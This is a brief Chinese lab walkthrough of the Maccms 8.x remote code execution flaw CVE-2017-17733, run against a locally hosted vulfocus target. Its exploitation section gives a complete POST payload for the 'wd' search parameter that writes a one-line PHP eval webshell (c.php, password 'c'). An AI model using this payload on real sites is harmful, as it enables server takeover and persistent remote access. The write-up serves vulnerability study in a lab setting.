maccms-cve_2017_17733
Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。
环境搭建
靶机:CentOS7(192.168.2.110)
利用本地vulfocus平台一键搭建maccms环境:
环境搭建完成
漏洞利用
访问http://192.168.2.110:59973/index.php?m=vod-search
post提交payload:
wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}
payload上床了一句话木马c.php,连接密码为c
执行上传后用yijian连接:
漏洞原理
参考:
(134条消息) 眉间雪之maccms8.x版RCE代码审计_CSDNPM250的博客-CSDN博客_苹果cms代码审计